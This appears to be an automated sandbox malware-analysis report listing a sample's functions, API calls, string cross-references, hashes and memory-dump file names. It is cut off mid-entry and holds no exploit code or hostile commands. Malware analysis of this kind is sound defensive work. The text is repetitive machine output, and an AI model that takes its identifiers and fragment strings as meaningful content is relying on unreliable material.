String ID:
API String ID: 3890896728-0
Opcode ID: 68a9c9e9fe1e9a0aa49f0c486e6bae9fc7b2941f5c70ad19147747e1f4076380
Instruction ID: 81355b6eeea5e940a339d344bdf4fbfc5aff9740e863b08faa44342e1891265f
Opcode Fuzzy Hash: 68a9c9e9fe1e9a0aa49f0c486e6bae9fc7b2941f5c70ad19147747e1f4076380
Instruction Fuzzy Hash: 8801F9B46097058FE305DF28D498B5ABBF1FB89304F10881CE4958B3A1CB7AA949DF81

Function 00ECCDF0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00ECCE04

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a43faad2f29b770a294a245bccf72aa2b6dc288bdc77a782076e5d0bfb0bb36c
Instruction ID: f6ba2fe4411fd5ba73f6785d0ad5e915c3d742dc2b29318d61f7812d33329b11
Opcode Fuzzy Hash: a43faad2f29b770a294a245bccf72aa2b6dc288bdc77a782076e5d0bfb0bb36c
Instruction Fuzzy Hash: 2CD0A7212A0A4C67D290A61CDD5FF2B325C9703B68F0016266262C62C2DC446921D575

Function 00ECCE23 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00ECCE35

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: d7c7320d41a94a36157a415fe76ad961ae874bb26138cc3570c50c5a75fbfc64
Instruction ID: 6dee4d581b3952991323fedb55ab459b7d9f90e99a41d1969b1ba413cda352c7
Opcode Fuzzy Hash: d7c7320d41a94a36157a415fe76ad961ae874bb26138cc3570c50c5a75fbfc64
Instruction Fuzzy Hash: F2D0C9303C430576F5749A18AC53F1432069306F24F70161AB322FE6D0CCD47111D529

Function 00EF9B60 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,00ED2F5C), ref: 00EF9B80

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: bfe23fd0af914e3ad2b0da1b990d748d306e35112a7d68016e36275dff33eb06
Instruction ID: d6af480c547bb164b60253512b3bf12a7a92dca626c8fa3ba20a968e7aacf812
Opcode Fuzzy Hash: bfe23fd0af914e3ad2b0da1b990d748d306e35112a7d68016e36275dff33eb06
Instruction Fuzzy Hash: A3D0A93100512AEBCA406B28BC01BCB3A98AF08230F170880B100AA060C262ACA0AAC0

Function 00EF9B40 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00ED4E57,00000400), ref: 00EF9B50

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: df4907ee0eb992e46925c535c09debe9f87b517b92d38e014b59b93503bab6b4
Instruction ID: d05b4aa01f718a5c293eff204dd641f9b626d88e877edc42878ab5736356c29a
Opcode Fuzzy Hash: df4907ee0eb992e46925c535c09debe9f87b517b92d38e014b59b93503bab6b4
Instruction Fuzzy Hash: 60C04C31145128AACA106B15EC05BC63A54AF45650F264451B10566071C6616C919694

Function 00F19754 Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 00F19A40

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8087f7804888532b05dd744d6f5f73113be70540e3bf74ea86767118bdde29cb
Instruction ID: 0d7f4aeed263821e5302e014335766e862623564797cb6423b0cab4c5c9dbc22
Opcode Fuzzy Hash: 8087f7804888532b05dd744d6f5f73113be70540e3bf74ea86767118bdde29cb
Instruction Fuzzy Hash: 97E0867754D159C7C7041F50445C7DD7A60DF15321F2506087C5342780C6710C80FA46

Non-executed Functions

Function 00ED2670 Relevance: 165.6, Strings: 131, Instructions: 1885COMMON

Download Yara Rule

Strings

T, xrefs: 00ED3AC1
3, xrefs: 00ED27E6
/, xrefs: 00ED294E
`, xrefs: 00ED41B6
E, xrefs: 00ED390D
|, xrefs: 00ED3C87
t, xrefs: 00ED39C1
c, xrefs: 00ED3410
1, xrefs: 00ED352C
n, xrefs: 00ED3A11
b, xrefs: 00ED43E7
`, xrefs: 00ED44B8
\, xrefs: 00ED3A81
b, xrefs: 00ED3A31
q, xrefs: 00ED2D17
*, xrefs: 00ED2CDF
~, xrefs: 00ED3187
c, xrefs: 00ED3FAB
p, xrefs: 00ED3CE7
V, xrefs: 00ED2E52
:, xrefs: 00ED3076
4, xrefs: 00ED26D2
/, xrefs: 00ED32B8
{, xrefs: 00ED2B7F
,, xrefs: 00ED2CEF
[, xrefs: 00ED30AE
D, xrefs: 00ED4338
a, xrefs: 00ED41AE
D, xrefs: 00ED3908
', xrefs: 00ED2D47
h, xrefs: 00ED2CF7
t, xrefs: 00ED3177
., xrefs: 00ED40F1
\, xrefs: 00ED30B6
r, xrefs: 00ED2D07
e, xrefs: 00ED3CD7
}, xrefs: 00ED3758
J, xrefs: 00ED2F04
R, xrefs: 00ED3AB1
a, xrefs: 00ED341A
a, xrefs: 00ED44B3
I, xrefs: 00ED2EFF
, xrefs: 00ED2D0F
y, xrefs: 00ED3738
d, xrefs: 00ED3A41
`, xrefs: 00ED341F
`, xrefs: 00ED43F1
X, xrefs: 00ED3A61
|, xrefs: 00ED3750
@, xrefs: 00ED3D27
f, xrefs: 00ED3CC7
b, xrefs: 00ED3FB0
x, xrefs: 00ED3961
a, xrefs: 00ED3903
H, xrefs: 00ED3AE1
Y, xrefs: 00ED309E
y, xrefs: 00ED2A62
b, xrefs: 00ED427D
A, xrefs: 00ED2757
g, xrefs: 00ED3CA7
a, xrefs: 00ED3C97
a, xrefs: 00ED43EC
", xrefs: 00ED2D1F
b, xrefs: 00ED3415
6, xrefs: 00ED3288
Z, xrefs: 00ED2B89
|, xrefs: 00ED3981
z, xrefs: 00ED3971
c, xrefs: 00ED43E2
c, xrefs: 00ED44A9
c, xrefs: 00ED4278
8, xrefs: 00ED2D4F
c, xrefs: 00ED41A4
U, xrefs: 00ED307E
h, xrefs: 00ED39E1
O, xrefs: 00ED3D37
L, xrefs: 00ED3B01
`, xrefs: 00ED3A21
L, xrefs: 00ED3D87
~, xrefs: 00ED3991
Z, xrefs: 00ED3A71
l, xrefs: 00ED3A01
q, xrefs: 00ED36F8
b, xrefs: 00ED44AE
J, xrefs: 00ED3AF1
w, xrefs: 00ED3728
Y, xrefs: 00ED2B84
3, xrefs: 00ED2861
f, xrefs: 00ED3A51
u, xrefs: 00ED3718
, xrefs: 00ED32C8
., xrefs: 00ED2CFF
K, xrefs: 00ED2F09
{, xrefs: 00ED3748
b, xrefs: 00ED41A9
a, xrefs: 00ED3FB5
l, xrefs: 00ED2EFA
I, xrefs: 00ED2D37
F, xrefs: 00ED3912
&, xrefs: 00ED2D3F
Z, xrefs: 00ED3DF7
v, xrefs: 00ED39D1
`, xrefs: 00ED4287
x, xrefs: 00ED3197
j, xrefs: 00ED39F1
D, xrefs: 00ED3F09
r, xrefs: 00ED39B1
O, xrefs: 00ED3B19
], xrefs: 00ED30BE
s, xrefs: 00ED3708
p, xrefs: 00ED3D07
@, xrefs: 00ED3B21
!, xrefs: 00ED32D0
W, xrefs: 00ED308E
M, xrefs: 00ED40E9
a, xrefs: 00ED4282
N, xrefs: 00ED3B11
$, xrefs: 00ED2D2F
m, xrefs: 00ED36D8
o, xrefs: 00ED36E8
P, xrefs: 00ED3AA1
`, xrefs: 00ED3FBA
8, xrefs: 00ED3527
w, xrefs: 00ED3CB7
f, xrefs: 00ED35CA
^, xrefs: 00ED3A91
9, xrefs: 00ED28B7
r, xrefs: 00ED3D17
`, xrefs: 00ED33A8
p, xrefs: 00ED39A1
V, xrefs: 00ED3AD1

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: $ $!$"$$$&$'$*$,$.$.$/$/$1$3$3$4$6$8$8$9$:$@$@$A$D$D$D$E$F$H$I$I$J$J$K$L$L$M$N$O$O$P$R$T$U$V$V$W$X$Y$Y$Z$Z$Z$[$\$\$]$^$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$c$c$c$c$c$c$d$e$f$f$f$g$h$h$j$l$l$m$n$o$p$p$p$q$q$r$r$r$s$t$t$u$v$w$w$x$x$y$y$z${${$|$|$|$}$~$~
API String ID: 0-970517751
Opcode ID: 635e73309f7b6ff6b1b086c51dcb6ce1f57cb96e6f3c39e27ad87e181e190045
Instruction ID: 0e62ad563696c005c0f4c47f09c0dc8d5242a2f35a443667137f68e9435a6dc9
Opcode Fuzzy Hash: 635e73309f7b6ff6b1b086c51dcb6ce1f57cb96e6f3c39e27ad87e181e190045
Instruction Fuzzy Hash: 66039F7110C7C08BD325CB3884847AFBBE2ABD6314F189A6EE1E9973D2D6798546C713

Function 00EF6690 Relevance: 19.0, Strings: 15, Instructions: 246COMMON

Download Yara Rule

Strings

`, xrefs: 00EF678B
i, xrefs: 00EF6893
Z, xrefs: 00EF66A8
Y, xrefs: 00EF66A3
C, xrefs: 00EF6898
Y, xrefs: 00EF66F0
X, xrefs: 00EF66EB
e, xrefs: 00EF6786
~, xrefs: 00EF674F
\, xrefs: 00EF688E
X, xrefs: 00EF669E
j, xrefs: 00EF6795
#, xrefs: 00EF68ED
5, xrefs: 00EF689D
Z, xrefs: 00EF66F5

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: #$5$C$X$X$Y$Y$Z$Z$\$`$e$i$j$~
API String ID: 0-3294723363
Opcode ID: 218b22c1c0bb5ff38fa90c5a0a5a95447d190bf781458c7b06e1a19171da4b10
Instruction ID: e1c9ca48aaf797fb26c60f8a53174a44b7af79c3b114d642f86cbaea5b5c23da
Opcode Fuzzy Hash: 218b22c1c0bb5ff38fa90c5a0a5a95447d190bf781458c7b06e1a19171da4b10
Instruction Fuzzy Hash: 6E910623A0C7D04BD3058538885436FEED34BE2224F6DCAADD5E5973C6C5B9C90683A3

Function 00EE96D8 Relevance: 9.1, Strings: 7, Instructions: 340COMMON

Download Yara Rule

Strings

;>*2, xrefs: 00EE99CE
9nI9, xrefs: 00EE99D6
='0{, xrefs: 00EE99DE
);?g, xrefs: 00EE99EE
cba`, xrefs: 00EE974C
[93=, xrefs: 00EE99E6
fa, xrefs: 00EE99F6

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
API String ID: 0-154584671
Opcode ID: a0e6129e1cdde5dc785f2875355f8ca0f775c3961f8459df3de16fb6a32c5338
Instruction ID: 285a547f9318af8d5b507fa8d301d5b57a37e0e4f1f15c1e84e530221bf7c67d
Opcode Fuzzy Hash: a0e6129e1cdde5dc785f2875355f8ca0f775c3961f8459df3de16fb6a32c5338
Instruction Fuzzy Hash: FFC1357560C3E48FC3208F2AC88066ABBE2BF86314F049A6CF4E567393D3358905CB52

Function 00EDC360 Relevance: 8.1, Strings: 6, Instructions: 626COMMON

Download Yara Rule

Strings

}~, xrefs: 00EDC91F
GI, xrefs: 00EDC775
CE, xrefs: 00EDC76D
JK, xrefs: 00EDC77D
=z9|, xrefs: 00EDC917
Vj)l, xrefs: 00EDC9D2

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: =z9|$JK$Vj)l$}~$CE$GI
API String ID: 0-2837980318
Opcode ID: 09248b4e0c23157d85b54b3b7132e20d24c7e61ca594914568ebeb3c46647e20
Instruction ID: 90d8517e6828f1df3f46fc0f8490f25e2629cfe2b406c7cb2168070e08d0d275
Opcode Fuzzy Hash: 09248b4e0c23157d85b54b3b7132e20d24c7e61ca594914568ebeb3c46647e20
Instruction Fuzzy Hash: D1020EB550C3408FC704DF29D89266BBBE2EFD5314F18A81DE0CA9B351E7358606DB92

Function 00EED085 Relevance: 6.6, Strings: 5, Instructions: 368COMMON

Download Yara Rule

Strings

0, xrefs: 00EED430
k, xrefs: 00EED4B6
AGsW, xrefs: 00EED496
#, xrefs: 00EED4AC
P, xrefs: 00EED554

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: #$0$AGsW$P$k
API String ID: 0-1629916805
Opcode ID: 102ca047bedb8e9c359b9ae943cd31b883031a4cd6fe59e8ba76db0023cce29e
Instruction ID: 291ccdd71f30b0fcf1e1ede1d5673d6a7f02f6a71a62a05ec7ef0d84eca03977
Opcode Fuzzy Hash: 102ca047bedb8e9c359b9ae943cd31b883031a4cd6fe59e8ba76db0023cce29e
Instruction Fuzzy Hash: 9FC1D37120C3C58ED328CB39C8913ABBBD2AFD6308F589A6DD4D99B2D1D7798409D712

Function 00EE80B0 Relevance: 5.4, Strings: 4, Instructions: 440COMMON

Download Yara Rule

Strings

'|, xrefs: 00EE8275
i>}0, xrefs: 00EE83AC
12, xrefs: 00EE83B8
-., xrefs: 00EE8576

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: '|$-.$12$i>}0
API String ID: 0-2215797287
Opcode ID: 15a77d926c252f3b8c26bba7c9d13103754431c44857ec242ef02fd6ff0fbf89
Instruction ID: aa068a6dc11d373f2a95af57f9c86bfbeef282c47074437e4da4fa68d38f0d9d
Opcode Fuzzy Hash: 15a77d926c252f3b8c26bba7c9d13103754431c44857ec242ef02fd6ff0fbf89
Instruction Fuzzy Hash: A2D10C722083558FD718CF29C89169FB7E2FFC5314F05892CE59A9B281EB74950ACB92

Function 010801C9 Relevance: 5.4, Strings: 3, Instructions: 1630COMMON

Download Yara Rule

Strings

uH3s, xrefs: 010814CD
6Ol, xrefs: 010804B5
3G={, xrefs: 0108068A

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
